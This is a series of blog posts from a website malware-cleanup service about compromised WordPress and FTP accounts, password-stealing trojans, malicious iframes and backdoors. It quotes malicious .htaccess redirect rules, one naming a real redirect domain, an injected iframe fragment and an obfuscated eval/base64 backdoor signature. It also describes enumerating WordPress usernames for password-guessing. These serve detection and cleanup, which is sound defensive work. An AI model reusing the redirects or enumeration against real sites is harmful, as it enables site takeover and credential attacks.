By

BlackOS helps website hackers automate their “business”

Trend Micro has released a report which gives some details about the automation of website hacking. Their report: http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackos-software-package-sold-in-underground-forums/ set us off on a search for more information.

We found that this software allows hackers to manage large lists of stolen FTP credentials. The hackers can easily inject custom iframe code into compromised websites. The code can be modified to redirect visitors depending on their operating system (Mac, Windows, etc.), browser (Safari, FireFox, Internet Explorer, Chrome, etc.) and even different versions of those operating systems and browsers.

They can even customize their code to redirect based on the referrer (Google, Yahoo, Bing…) and country of origin.

When you see how the hackers talk about easily finding 10,000 websites, it becomes very alarming. One clip we found is this:

Approximately 15-20% have access to FTP SSH, you can also check behind mail + pass on base have access to FTP or SSH. – all accounts reviewed by our SSH server exploits to get root. With 10k SSH accounts you can get in the area of 500 root access to the servers!

What it appears they’re saying is that 15-20% of FTP accounts are also the credentials for SSH. If so, the hackers can gain “root” access via SSH.

Out of 10K accounts you can get about 500 with server root access! Simple backdoor is installed for all ‘root’s to elevate the rights for consequent access.

If you’re on a VPS or dedicated server, this type of access typically means complete server rebuild or reload. When they have root access it’s game over. They won.

Why do we bring this to your attention?

You have to constantly think about all the possible ways hackers have of getting into your server – always.

Frequently we see many FTP accounts created for the various websites on a VPS or dedicated server. If you’re going to host multiple websites on your server, please create a separate cPanel account for each site. That creates a separation between your sites.

By

Let’s be careful out there

If you’ve read anything online, undoubtedly there have been headlines about exploits, vulnerabilities, identities stolen and other compromises.

Are you one of the 9.3% using Internet Explorer 10 (IE10)? Hopefully, you keep your software updated, as Microsoft did squeak in a patch last Tuesday. However, if you haven’t, please stop reading this and update it and all other Microsoft patches immediately.

FireEye recently found a combination of watering-hole attack and drive-by download that utilizes the exploit in IE10.

You don’t know what a watering-hole attack is?

Let’s say the hackers find an exploit in a particular browser and they want to use that to infect the computers of people most likely to use that browser. They will find one or more websites that focus on that particular group of people. The hackers will then try to infect those websites with some drive-by download code. This means that anyone visiting those websites will be subject to the download which will infect their computer.

After the websites have been infected with the drive-by download code, hackers will blast out a series of SPAM emails that include a link to one of their infectious sites. The SPAM will be targeted to people in the targeted industry. This is called a watering-hole attack.

Just so you don’t think I’m focusing on Microsoft, these same types of attacks happen on FireFox, Chrome and yes, even on Macs.

Your best defense against these and other attacks is to keep your software updated – constantly. This doesn’t mean just your browser, but all Adobe products, your operating system and all other software programs installed on your computer.

April of 2014 will see the end of support for Windows XP and Office 2003. If you haven’t upgraded these yet, you should make plans. Without support from Microsoft, you will no longer get updates to that software. Hackers know there will be many people refusing to upgrade so not upgrading will make you the “low hanging fruit” for hackers.

In addition to keeping your software updated, please let everyone you know to use strong passwords. This cannot be emphasized enough. About 30% of the websites we clean are the result of compromised passwords. Make it at least 9 characters long and DO NOT use common, related words.

A recent informal survey we conducted shows that many passwords end with either the year, 123 or the exclamation mark (!). If this sounds familiar, please change your passwords immediately.

One other key point that we’ve been “pushing” for some time now is to schedule daily full system scans with your anti-virus software.

Here’s why.

If the anti-virus company finds a new virus “in the wild” on Monday, they will analyze it and create a rule to detect that virus. Then on Tuesday, you update your anti-virus software – either automatically or manually, this means your computer is protected from getting infected by that virus from Tuesday moving forward. However, if your computer was infected by that virus on Monday, your anti-virus program won’t remove it until you run a full system scan.

That’s why it’s critical that you run full system scans – EVERY DAY!

If you have any questions, please either email me at: traef@wewatchyourwebsite.com or post a comment.

Let’s be careful out there, huh?

Thank you for reading.

By

Our business is a painkiller, not a vitamin.

I recently read an article on entrepreneur.com that asked the question, “Is your product a vitamin, or a painkiller?”

It got me thinking about the thousands of website owners we’ve talked with over the years of removing website malware.

We’ve been told, “You’re a saint!”, “You’re so awesome!”, “I love you for fixing this.” “You’re a genius!” and many other compliments.

You see, rarely do people “want” our service – until they need it. Then, it becomes a must have – immediately.

It appears that most website owners don’t believe they’re on the radar of today’s cyber criminals. They believe that hackers focus more on companies like Target and other high profile websites.

We get asked, “what do they want with my little website?”

I remember years ago, there was a book, “Multiple Streams of Income” by Robert Allen. In that book he describes the need to create multiple streams of income so that you slowly, but purposefully, build your net worth. This strategy protects you from the “all your eggs in one basket” disaster.

Hackers (cyber criminals), use this same strategy. A report from a few years ago by Symantec showed that hackers can make up to $1,000 per computer they infect. I believe this number might be a little high now as the cyber criminal world has increased in members, but it must still be relatively accurate.

Websites are at or very near the 1 billion mark. This creates various opportunities for cyber criminals. They can infect a 1,000 or websites in a week (yes they can!) and use 250 to try and infect the computer of anyone visiting those sites. The next 250 websites out of that 1,000, can be used for a phishing campaign that steals the banking login credentials of unsuspecting people. The remaining 500 websites can be sold to another cyber criminal who wishes to send out spam emails that lead people to the phishing based websites.

Ah, all in a days work!

Hackers have many ways to use your website – for their nefarious purposes.

When it happens, people call us to remove the pain. We become their painkiller.

The pain they encounter includes:

  • Loss of search engine rankings
  • Complaints from visitors
  • A sense of being violated

Website owners want and need our services at that point. Then we become their painkiller. Not a vitamin.

Thank you for reading.

By

FTP Password Stealing Malware

For years now, I’ve been writing about how often websites are infected by hackers stealing their CMS (WordPress, Joomla, etc.), FTP or hosting account login credentials.

I know that some of our competitors roll their eyes whenever we help someone in a forum seeking help with an infected website and we determine that their site was compromised due to stolen login credentials. However, our experience shows this to be a widely used method by today’s cybercriminals.

Here is a link to an article about how this malware works: http://vinsula.com/hunting-down-ftp-password-stealer-malware-with-vinsula-execution-engine/

In the article you’ll see how this malware works. It seeks certain files on your local computer and sends them to the hackers CnC server (Command ‘n Control server). You’ll see in that article that it also seeks out certain anti-virus programs and either disables them or reconfigures them.

One other interesting point of this article is how they obtained the malware – via an infected email. You have to be suspicious of all emails. We constantly see one that looks like it’s from LinkedIn, but if you hover over the link to see their profile before accepting their invitation to connect, you’ll see it does not go to www.linkedin.com. This is a very cleverly crafted email designed to infect the unsuspecting recipient.

Please share this others. The more knowledge shared about how hackers (cybercriminals) work the better and safer we’ll all be. Have any incidents like this to share? Let me know…

Thank you for reading.

By

What’s the best anti-virus program?

In cleaning infected websites and protecting them, we constantly see infected websites that have been infected due to stolen passwords.

Which passwords?

That all depends. Sometimes it’s the CMS (WordPress, Joomla, Drupal, etc.) or the ecommerce (Zen Cart, osCommerce, etc.). Other times it’s either the hosting account or the FTP account’s password that is stolen.

How can we tell?

There are numerous ways of determining when stolen passwords were used as the point of entry into a hosting account or website, but frequently we can see successful logins in the log files from places all over the world. Mind you, these are not attempted logins, but actual logins.

Often times we can tell by the type of infection or where the infectious code is located, whether or not the point of entry to an infected website is via stolen passwords.

How does this happen?

Typically there is a virus on someone’s local computer that is stealing the password. When this happens you can “cloak” your WordPress login page, you can have a 52 character password with multiple special characters, you can rename the admin account, but none of this matters as the password stealing viruses and trojans steal: the login URL, the username and the password.

This can also happen if you’re using SFTP or FTPS, the “secured” file transfer protocol.

Yes, this even happens to Mac users. Quite often we find that Mac owners don’t have any anti-virus program or they’re using ClamAV for Mac.

With everyone seeking “free” anti-virus programs, we typically recommend: Free version of Avast for Mac, or Sophos for Mac.

On PCs, the most used anti-virus program is Microsoft Security Essentials. That is not what we recommend, but that is what most people are using.

Today, I read an article that gives some details into why Microsoft Security Essentials may not be a reliable program to use if you’re trying to keep your PC safe.

Here is the article I read:

Please understand I am not a Microsoft hater. I don’t hate anyone. But in our efforts to lower our already low re-infection rate (currently at .048%) we like to recommend products that will save you money and be highly effective.

If you could take a minute, let me know what anti-virus program you use and whether you’re on a Mac or a PC.

Thank you.

By

Unauthorized access to drupal.org

We received an email yesterday:

Dear community member,

We respect the privacy of your information, which is why, as a precautionary measure, we are writing to let you know about an incident that involves your personal information. The Drupal.org Security and Infrastructure Teams have discovered unauthorized access to account information on Drupal.org and groups.drupal.org. Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly.

This unauthorized access was made via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within the Drupal software itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.

We have implemented additional security measures designed to prevent the recurrence of such an attack, and to protect the privacy of our community members.

The next time you attempt to log into your account, you will be required to create a new password.

Below are steps you can take to further protect your personal information online. We encourage you to take preventative measures now to help prevent and detect the misuse of your information.

First, we recommend as a precaution that you change or reset passwords on other sites where you may use similar passwords, even though all passwords on Drupal.org are stored salted and hashed. All Drupal.org passwords are both hashed and salted, although some older passwords on groups.drupal.org were not salted. To make your password stronger:

* Do not use passwords that are simple words or phrases
* Never use the same password on multiple sites or services
* Use different types of characters in your password (uppercase letters, lowercase letters, numbers, and symbols).

Second, be cautious if you receive emails asking for your personal information and be on the lookout for unwanted spam. It is not our practice to request personal information by email. Also, beware of emails that threaten to close your account if you do not take the “immediate action” of providing personal information.

For more information, please review the security announcement and FAQ at https://drupal.org/news/130529SecurityUpdate. If you find any reason to believe that your information has been accessed by someone other than yourself, please contact the Drupal Association immediately, by sending an email to password@association.drupal.org.

We regret that this incident has occurred and want to assure you we are working hard to improve security.

If you have an account with drupal.org or groups.drupal.org you should definitely be changing your password. Also, if you use the same email address and password on other sites, you should change those as well.

Please note, if you read this carefully, the unauthorized access was due to a third-party software on the server – NOT a vulnerability with the drupal software and does not affect your own drupal installation.

Just an FYI…

By

The recent widespread attack on WordPress sites

While we may not have been the first to report this, we have been quietly gathering information and watching.

First, I’d like to start off by saying that this is the “current” attack and most of the suggestions online are temporary fixes for this attack. What about the rest of the time? What about the next attack?

Next, blocking by IP is not going to work. This botnet is so large that the IP addresses could come from anywhere: overseas or even here in the US. This is like blocking user-agents and other easily spoofable settings. Hackers are too smart for this.

Setting your .htaccess to only allow access to your wp-admin or wp-login.php is not going to work for everyone. Most people are still on dynamic IP addresses, so locking it down to a select group of IP’s will lock you out and yes you could go into FTP and delete, but who is going to do that on a regular basis? And, are you going to go back after you’ve logged in and change that .htaccess again? and again?

We have seen in more recent attacks that once the hackers infect a local computer, they can launch their attack from there. So the IP address looks like the attack came from your computer.

Also, changing the location of the wp-admin or wp-login.php file is going to help you on this attack, but the more frequent attack we see is the password stealing trojan.

This trojan has infected PCs and Macs and it steals the URL, username and password sequence. You could change the URL to:www.yourdomain.com/wp-dontthinkyoulleverguessthis.php and change your username to: rumplestiltskin and have a password that’s twice as long as the english alphabet and you’re still going to have an infected website if you have the password stealing trojan.

If you want to know the username, even if it’s been changed and admin removed, try this with your URL:

http://yourdomain.com/blog/?author=1

Replace the above URL before the ? with the exact URL to your blog. If you get a valid response, you know that you have the admin user still intact. If you’ve changed the admin user or deleted it, you’ll get a response that says something like:

Sorry, but you are looking for something that isn’t here.

To keep searching, change the 1 to a 2 and see what happens. If you get a valid response your URL will have something like:

http://yourdomain.com/author/newadminhere/

Now you know the userID and the username name. Add your dictionary of passwords and continue.

You could also password protect the wp-admin folder with an .htaccess file. Guess what? The password stealing trojan steals all the information to a successful login even the secondary passwords.

Over the past 2 weeks, we’ve cleaned 1,978 infected websites and 1,755 of them were compromised due to the password stealing trojan. (62% of the people we’ve helped were using Macs). We have the log files to prove it. We see a website owned by someone here in the US and we see successful logins from all over the world. That is proof.

We hear all the time, “I don’t need anti-virus because I’m on a Mac”. Or, “I don’t have a virus. I know what websites to stay away from.” Really? Because that persons website was infected and was attacking a browser exploit on the computer’s of visitors to his site. Surely that person must stay away from their own website then, right?

What does work?

Keep your local computer clean. Install something to detect malicious behavior.

Two-factor authentication works. Captcha is good for now, but we keep seeing reports where hackers have cracked many captchas. But for the automated attacks of hackers, it works well.

Use something like LastPass or on a Mac use KeyChain. Do not save the login credentials in your browser – DO NOT! This is too easy for hackers to steal.

Create a separate user on your local computer and use that for day-to-day work and only log in as administrator when you need to do updates or install software. Keep in mind that when a virus/trojan breaches your computer it has the same access as the currently logged in user. If you have admin rights, guess what? So does the virus/trojan.

In our honeypot analysis of this current attack, it appears that while the hackers are using a dictionary attack of pre-created passwords, they also have buried in their password lists legitimate passwords stolen from computers.

We see the attempted passwords and too many of them are so bizarre that they couldn’t have been part of a computer generated password dictionary.

If you want to hide your real intention, why not bury it inside a larger attack that will cause a lot of frenzy and confusion?

We believe the hackers responsible for this attack are sitting back and laughing at the frenzy they’ve created knowing that their real intention totally slipped by everyone – well almost everyone.

By

Hackers using errors to redirect websites

Our website malware removal service has removed malware from over 151,000 websites, our most recent cleanings have seen hackers adding malicious code to 500.php files (which handles website errors of a specific type), and then creating some hidden error in a website to cause the site to call the 500.php file and thus run their malicious code.

The strategy isn’t new, but the method we found recently was quite unique.

The sites we were working on were WordPress sites. The owners of these sites were very diligent about keeping their WordPress core files updated and their plugins too, however, they were less diligent about keeping their own local computers safe.

You see, all of these particular site owners were Mac users. I don’t have anything against Macs, but the fact that Mac users have been told for so long that they don’t need any anti-virus software leaves them vulnerable.

Whether it’s because Macs have finally reached enough popularity, or hackers know most Mac users don’t have any method to detect them, Macs are on the radar of hackers.

We will be posting steps to follow to make your Mac more difficult for hackers to infect your Mac investment.

The specific malicious code found in the 500.php files won’t be posted here because we found some quite radically different code in the sites we’ve recently cleaned. Let’s just say that you check all of your error pages for anything that doesn’t look like it belongs.

The common thread in these most recent website malware cleanings was that they were all WordPress sites and each one of them, after we removed the malicious code in the error files, would redirect to the /wp-admin/install.php file and give us a 500 error. Upon further investigation (thank you Ty) it was discovered that the database table prefix in the wp-config.php file specified wp_ but the actual tables in the database had prefixes that were quite different. This was the error that the hackers were producing.

By changing the table name prefix, there wasn’t any specific file evidence of anything being changed, except for the 500.php files, but most people see those, know they were put there by the hosting provider and never think twice about them.

The strategy here was to infect the page that an error would redirect to and then create a hidden error to cause that error page to be run. Wile-E-Coyote, Super Genius!

I know what you’re thinking (did he fire 6 shots or only 5…) not that. If the website owners had kept everything up-to-date, how did the hackers gain access?

As mentioned, each of these specific infected websites were owned or operated by people with Macs. In our forensic analysis of website infections we always review the log files if available. In each case we found evidence of IP addresses from outside the country of the website owner being used to login to the WordPress dashboard.

Of course many people tell us that’s impossible because they have passwords that are 12 characters long and have a combination of upper and lower case letters, numbers and special characters. Or in a few of these cases, the people had followed the popular WordPress security recommendations and removed the admin user and also used plugins that allowed them to change the name and location of the wp-admin folder. How does a hacker breach a website that has followed all of these steps?

With WordPress being so popular and many people having websites, hackers know that if they infect a local computer, chances are good that the user will have some login to a website. The hackers put keyboard loggers on local computers and just wait for the user to login to a website.

What do they record?

The URL, the username and password. Even if your login URL has been changed to mydomain.com/837ujdndtgkdhghs6s0d6 and your username changed to Rumplestiltskin and your password is nothing short of “Supercalifragilisticexpialidocious” with every other “a” replaced with @ and every third “i” replaced with either a “1″ a “l” or an “!”, the hackers malware on your local computer will steal all that information.

Keep in mind, hackers only need one way in to your website. You must know their methods and block them all.

In order to keep your website safe and secure you must be certain that everyone who you provide login rights to for your website, has their local computer fully secured. Otherwise, you’ll be calling us to help you clean your site.

By

Twitter iframes

Over the past few weeks we’ve cleaned many infected websites that have been infected with an iframe named Twitter. This iframe has nothing to do with Twitter, but that’s what the hackers named it.

It starts out like:

< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

where the height and width can be other numbers as well. If this line of code is in a .js file (javascript) then it will probably start with:

docu ment .write(‘< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

This type of infection is usually accompanied by code added to the .htaccess files similar to:


RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://(some malicious domain and querystring goes here) ?h=1459447 [L,R]

We haven’t always seen the modified .htaccess files but generally there will be some “sprinkled” throughout an infected website.

This has been due to compromised login credentials. Many people don’t believe us or want to hear that, but it’s a fact. In all cases where we’ve had access to the FTP logs, we see lines like:

Mon Jan 28 09:35:05 2013 0 xxx.xxx.xxx.xxx 239 /home1/(path to website files/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c

The i before the r and the username indicates this file was uploaded to your site. If this line in the logs were from someone downloading a file to their local computer or another location, it would have an o.

This activity in a log file shows us that someone from source IP of xxx.xxx.xxx.xxx uploaded a file named .htaccess of 239 bytes to this folder using user@domain on January 28. When we look in the above referenced file it has the Rewrite code listed above. From this we know that a malicious file was uploaded to that site using the username specified. How did this “someone” get that username?

Most likely from a virus on a computer used to legitimately upload files. Yes, even Macs are susceptible.

We also see from the log files that other backdoors have been uploaded. These have to be found and removed or your site will get re-infected again and again.

If you’ve fallen victim to this type of infection, please let us know.

Thank you.

By

Attack of the default.php files

We’ve been seeing many infected websites that have numerous default.php files “sprinkled” throughout the site.

These files are being used by hackers to infect other websites.

The code inside the default.php files usually starts with:

eval (gzinflate ( base64_decode ("...

The file will usually be either 2,858 or 2,556 in size.

These files are uploaded to the website via FTP.

How do hackers upload files to your site with FTP?

They have stolen your password!

If you have access to your FTP log files, you will see some entries like this:

Sun Jan 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c

The ftpaccount shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be the using the computer with a virus on it that has stolen the passwords.

The default.php files are also used to upload malicious .htaccess files. Those files will have something like this:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R]

We’ve seen various domains inserted into that last line but the format is basically the same: URL/randomname.html?h=(some numbers)

First thing is to change all your passwords: hosting account, FTP, website (WordPress, Joomla or other…). Then DO NOT log back in again until you have scanned all your computers – yes even Macs.

Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

Again, please run daily virus scans on all computers – daily. When your anti-virus program updates, it typically doesn’t run a full scan. So any updates you received today on your anti-virus program will not detect anything already on your system until you run a full scan. The updates will only protect your computer from the new infections.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.

If you need help cleaning this up, please send me an email at: traef@wewatchyourwebsite.com

Thank you.

If you found this useful, please share it.